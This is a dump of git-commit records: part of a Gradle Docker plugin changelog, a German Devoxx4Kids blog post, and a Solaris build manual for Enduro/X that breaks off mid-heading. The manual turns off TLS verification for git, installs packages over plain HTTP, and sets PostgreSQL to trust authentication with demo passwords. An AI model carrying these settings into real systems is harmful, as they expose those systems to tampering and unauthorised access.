`DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - 
{uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on 
`DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - 
{uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. 
Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. 
Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3487ba7ef788d67c050d568ecaac1d02a62e6e7c","subject":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","message":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_contents":"= Erste Devoxx4Kids in Paderborn\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n:hp-image: \/covers\/devoxx4kids-cover.png\n\/\/ :published_at: 2019-01-31\n:hp-tags: devoxx4kids,devoxx\n\/\/ :hp-alt-title: My English Title\nAm 14. Oktober fand in den R\u00e4umen des Heinz-Nixdorf Instituts der universit\u00e4t der erste http:\/\/www.devoxx4kids.de\/paderborn\/[Devoxx4Kids Paderborn Workshop] statt. Morgens um 9 trafen sich X Mentoren und Y Kindern um gemeinsam verschiedene Bereiche der Informatik zu entdecken. Nach einem gemeinsamen Fr\u00fchst\u00fcck konnte der Tag beginnen.\n\nDas Mentorenteam aus Studenten, wiss. Mitarbeiten und freiwilligen aus der lokalen Wirtschaft konnten den Kindern einen Einblick in Spieleprogrammierung, Robotik und Elektronik bieten. 
The participants were split into 3 groups, and each group took part in every workshop in order to get to know the broad field of computer science. During the lunch break everyone could recover and, with the food they had brought along and the fruit that was provided, gather strength for the group photo in beautiful weather in front of the HNF fountain. \n\nAfter the last workshop round the parents arrived one by one. The children could show their parents what they had accomplished. Thanks to several sponsors, the children could also take their self-written programs home on a USB stick. Special thanks go to Z, who provided the children with a power bank as a goodie. Thanks as well to wescale, who provided T-shirts for all mentors. The next Devoxx4Kids workshop takes place on February 3. Registrations go to Melanie Margaritis (melanie.margaritis@upb.de). Anyone who would like to support us as a mentor or sponsor is also welcome to contact Frau Margaritis.\n\n","old_contents":"= Erste Devoxx4Kids in Paderborn\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n:hp-image: \/covers\/devoxx4kids-cover.png\n\/\/ :published_at: 2019-01-31\n:hp-tags: devoxx4kids,devoxx\n\/\/ :hp-alt-title: My English Title\nAm 14. Oktober fand in den R\u00e4umen des Heinz-Nixdorf Instituts der universit\u00e4t der erste Devoxx4Kids Paderborn Workshop statt. \n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b465d46d6905041ed02cb797dae469062a40f6ca","subject":"Updated solaris install manual","message":"Updated solaris install manual\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/solaris_notes.adoc","new_file":"doc\/solaris_notes.adoc","new_contents":"Building Enduro\/X On Oracle Solaris Platform\n============================================\nMadars Vitolins\nv1.0, 2016-06:\n\tInitial draft\n:doctype: book\n\n== About manual\n\nThis manual describes how to build 'Enduro\/X' on the Oracle Solaris platform. \nThe document is based on Solaris 11 on an x86 machine. The compiler used for Enduro\/X is GCC.\n\n== Overview\n\nThis manual includes a basic installation of Enduro\/X which does not \ninclude building of documentation and does not use GPG-ME encryption for bridges.\n\nEnduro\/X on the Solaris platform is using System V message queues.\n\n\n== Operating System Configuration\n\nFor OS configuration settings \nsee ex_adminman(guides)(Enduro\/X Administration Manual, Setup System chapter).\nThis step must be executed before continuing.\n\n== Installation process\n\nThe installation process will install the required open source packages from \n'http:\/\/www.opencsw.org'. You may install the packages with a different approach. \nThis is just a sample process for getting the build system working under Solaris.\nFor getting Enduro\/X to work we basically need the following packages:\n\n. git\n\n. cmake\n\n. flex\n\n. bison\n\n. libxml2\n\n. gcc\/g++\n\n=== Packages to be installed\n\nThe following operations will be done from the root user. This will download\nand install the open source packages to the local machine:\n\n---------------------------------------------------------------------\n$ su - root\n# pkgadd -d http:\/\/get.opencsw.org\/now\n# \/opt\/csw\/bin\/pkgutil -U\n# \/opt\/csw\/bin\/pkgutil -y -i git libxml2_dev flex bison cmake gmake\n---------------------------------------------------------------------\n
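\nTo verify that the freshly installed tools are visible (a quick sanity check; the `--version` flags are standard for these tools, and the paths assume the OpenCSW defaults used above):\n\n---------------------------------------------------------------------\n$ \/opt\/csw\/bin\/git --version\n$ \/opt\/csw\/bin\/cmake --version\n$ \/opt\/csw\/bin\/bison --version\n---------------------------------------------------------------------\n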
\n=== If installing GCC...\n\n---------------------------------------------------------------------\n$ su - root\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n=== If installing Sun Studio (on Solaris 11)...\n\n- According to: https:\/\/pkg-register.oracle.com\/register\/product_info\/6\/\n\n- Register and request access, then download the \npkg.oracle.com.key.pem and pkg.oracle.com.certificate.pem files from Oracle\nto the server.\n\nThe installation shows the process for version 12.4, but any later available version can\nbe installed. Also note that *.profile* and *$HOME\/ndrx_home* later need to \nmatch the path, for example *\/opt\/developerstudio12.6*.\n\n---------------------------------------------------------------------\n$ su - root\n# mkdir -m 0775 -p \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.key.pem \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.certificate.pem \/var\/pkg\/ssl\n\n# pkg set-publisher \\\n-k \/var\/pkg\/ssl\/pkg.oracle.com.key.pem \\\n-c \/var\/pkg\/ssl\/pkg.oracle.com.certificate.pem \\\n-G '*' -g https:\/\/pkg.oracle.com\/solarisstudio\/release solarisstudio\n\n# pkg list -af 'pkg:\/\/solarisstudio\/developer\/solarisstudio-124\/*'\n\n# pkg install -nv solarisstudio-124\n\n# pkg install solarisstudio-124\n---------------------------------------------------------------------\n\n=== If installing Sun Studio (on Solaris 10)...\n\nFirstly download the \"tarfile\" version from Oracle, visit \nhttp:\/\/www.oracle.com\/technetwork\/server-storage\/solarisstudio\/downloads\/tarfiles-studio-12-4-3048109.html\n\nNext once the tar file is on your server, extract it and start the install:\n\n---------------------------------------------------------------------\n# bzip2 -d SolarisStudio12.4-solaris-x86-bin.tar.bz2\n# tar -xf SolarisStudio12.4-solaris-x86-bin.tar\n# cd SolarisStudio12.4-solaris-x86-bin\n# .\/install_patches.sh\n# mv solarisstudio12.4 \/opt\n---------------------------------------------------------------------\n\nFor Solaris 10 we also need gmake to work as \"make\", thus:\n---------------------------------------------------------------------\n# ln -s \/opt\/csw\/bin\/gmake \/usr\/bin\/make\n---------------------------------------------------------------------\n\nThis will put the compiler in \"\/opt\/solarisstudio12.4\", the path later used in\nthis tutorial.\n\nAlso for Solaris 10 we need the \"ar\" tool, which we will use from the GNU package:\n\n---------------------------------------------------------------------\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n== Getting the source code\n\nFirstly we need to add \"user1\", under which we will perform the build actions.\nFor test purposes we will prepare a new user for which Enduro\/X will be built \n(this adds \/opt\/csw\/bin to the path; you may modify that to your needs, and\nadd \/opt\/solarisstudio12.4\/bin if Sun Studio is installed).\n\n=== Adding user on Solaris 11\nWe add the user \"user1\" and also set the open file descriptor limit to 10000; by\ndefault it is 256, which is too low for unit testing.\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -m user1\n# passwd user1\n# projadd -K \"process.max-file-descriptor=(basic,10000,deny)\" enduroxproject\n# usermod -K \"project=enduroxproject\" user1\n# su - user1\n---------------------------------------------------------------------\n
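\nTo confirm that the raised file descriptor limit is effective for the build user (a hedged check; the resource control name matches the one set via projadd above):\n\n---------------------------------------------------------------------\n$ prctl -n process.max-file-descriptor $$\n$ ulimit -n\n---------------------------------------------------------------------\n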
\n=== Adding user on Solaris 10\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -d \\$HOME -m -s \/usr\/bin\/bash -c \"User1 User1\" user1\n# mkdir \\$HOME\n# chown user1:staff \\$HOME\n# su - user1\n---------------------------------------------------------------------\n\n=== Preparing the user environment\n\n---------------------------------------------------------------------\n\n$ bash\n$ cat << EOF >> .profile\nexport PATH=\\$PATH:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin\n# Needed if building with postgres...\nexport LD_LIBRARY_PATH=\\$LD_LIBRARY_PATH:\/opt\/csw\/lib\/64\nEOF\n$ chmod +x .profile\n$ source .profile\n$ cd \\$HOME\n$ GIT_SSL_NO_VERIFY=true git clone https:\/\/github.com\/endurox-dev\/endurox\n$ cd endurox \n$ git config http.sslVerify \"false\"\n---------------------------------------------------------------------\n\n=== Enduro\/X basic Environment configuration for HOME directory\n\nThe code below creates the 'ndrx_home' executable file which loads the basic environment, \nso that you can use the sample configuration provided by Enduro\/X in the 'sampleconfig' directory. \nThis also assumes that you are going to install to the '$HOME\/endurox\/dist' folder.\nThe file below will override the sample configuration.\n\n---------------------------------------------------------------------\n$ cat << EOF > $HOME\/ndrx_home\n#!\/bin\/bash\n\necho \"Loading ndrx_home...\"\n# Where app domain lives\nexport NDRX_APPHOME=$HOME\/endurox\n# Where NDRX runtime lives\nexport NDRX_HOME=\\$HOME\/endurox\/dist\/bin\n# Debug config too\nexport NDRX_DEBUG_CONF=\\$HOME\/endurox\/sampleconfig\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\\$HOME\/endurox\/sampleconfig\/ndrxconfig.xml\n\nexport FLDTBLDIR=\\$HOME\/endurox\/ubftest\/ubftab\n\nexport PATH=\/usr\/bin:\/usr\/sbin:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin:\/opt\/csw\/bin:\\$HOME\/endurox\/dist\/bin\nexport LD_LIBRARY_PATH=\/usr\/lib\/sparcv9:\\$HOME\/endurox\/dist\/lib64:\/opt\/solarisstudio12.4\/lib:\/usr\/lib64:\/opt\/csw\/lib\/64\n\n################################################################################\n# In case of building with PostgreSQL database testing support\n# or building endurox-java with PostgreSQL DB tests (03_xapostgres), then\n# configure the below settings (demo values provided):\n# If so - uncomment below\n################################################################################\n#export EX_PG_HOST=localhost\n#export EX_PG_USER=exdbtest\n#export EX_PG_PASS=exdbtest1\n# currently uses default port\n#export EX_PG_PORT=5432\n#export EX_PG_DB=xe\n\n#\n# If using PostgreSQL for Solaris 11 uncomment:\n#\n#export PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\n\n\nEOF\n\n$ chmod +x $HOME\/ndrx_home\n---------------------------------------------------------------------\n\n=== Configuring PostgreSQL\n\nIf the Enduro\/X PostgreSQL driver needs to be built for Solaris, PostgreSQL\nneeds to be installed for build and test purposes. On Solaris 10, PostgreSQL\ncomes with the operating system, thus only access rights and users need to be\nconfigured.\n\nNote that if you plan to use ECPG mode, the ecpg pre-compiler needs to know where\nthe ecpg libraries live. Thus LD_LIBRARY_PATH must be set during the build time.\n\nIt can be done in the following way:\n\n--------------------------------------------------------------------------------\n\n# su - user1\n$ cat << EOF >> .profile\nexport LD_LIBRARY_PATH=\/opt\/csw\/lib\/amd64\nEOF\n\n--------------------------------------------------------------------------------\n\nAfter this, log out and log in again as user1 to apply the .profile settings.\n
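\nThe ecpg pre-compiler can then be checked from the build user (a sketch; the binary location is an assumption based on the OpenCSW PostgreSQL 9.3 layout used below):\n\n--------------------------------------------------------------------------------\n$ \/opt\/csw\/libexec\/postgresql\/93\/ecpg --version\n--------------------------------------------------------------------------------\n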
\nAlso, to activate the PostgreSQL inclusion in the build, add the *-DENABLE_POSTGRES=ON*\nflag to the cmake command line (later in the build section).\n\nFor Solaris 11 it needs to be installed:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n\n-- Install with:\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql93\n\n-- Install dev\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql_dev\n\n-- enable for auto start\n# svcadm enable cswpostgresql-93\n\n# su - postgres\n\n-- Create profile entry to have path to postgres binaries\n\n$ cat << EOF > ~\/.profile\n\n#!\/bin\/bash\n\nexport PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\/\n\nEOF\n\n$ chmod +x ~\/.profile\n\n-- Start postgres from Postgres user\n$ \/opt\/csw\/bin\/pg_ctl-93 -D \/var\/opt\/csw\/postgresql\/93 -l logfile start\nserver starting \n\n\n\n--------------------------------------------------------------------------------\n\nFor Solaris 10, just enable it:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n# svcadm enable svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nNow create the database for Enduro\/X tests (Solaris 10 & 11):\n\n--------------------------------------------------------------------------------\n# su - postgres\n\n$ createuser exdbtest\n\n$ createdb xe\n\n$ psql -d template1\n\n> alter user exdbtest with encrypted password 'exdbtest1';\n> grant all privileges on database xe to exdbtest;\n> \\q\n\n--------------------------------------------------------------------------------\n\nThe configuration files need to be updated for authentication, and distributed\ntransactions must be enabled too.\n\nEdit *postgresql.conf*, set \"max_prepared_transactions\"\nto 1000.\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/postgresql.conf*\n\nSolaris 11(.4): *\/var\/opt\/csw\/postgresql\/93\/postgresql.conf*\n\n--------------------------------------------------------------------------------\n\nmax_prepared_transactions = 1000 # zero disables the feature\n\n--------------------------------------------------------------------------------\n\nFor access permissions and network configuration, update \n*pg_hba.conf*, so that it contains the following:\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/pg_hba.conf*\n\nSolaris 11: *\/var\/opt\/csw\/postgresql\/93\/pg_hba.conf*\n\n--------------------------------------------------------------------------------\n\nlocal all all trust\nhost all all 127.0.0.1\/32 md5\nhost all all ::1\/128 md5\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 10:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 11:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart cswpostgresql-93\n\n--------------------------------------------------------------------------------\n
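\nAfter the restart it is worth confirming both the login and the transaction setting (a hedged check; psql should prompt for the 'exdbtest1' password configured above and report the value 1000):\n\n--------------------------------------------------------------------------------\n$ psql -h 127.0.0.1 -U exdbtest -d xe -c 'show max_prepared_transactions;'\n--------------------------------------------------------------------------------\n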
\n== Building the code with GCC\n\nIt is assumed that gcc is the default compiler on the system (i.e. Oracle Studio is not installed), \nthus the following cmake will pick up gcc by default:\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc\\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n=== Solaris 10\n\nAlso note that the CC variable needs to be exported as it is used by \nthe buildclient script for the view test cases.\n\n---------------------------------------------------------------------\n$ export CC=gcc\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc \\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n\n== Building the code with 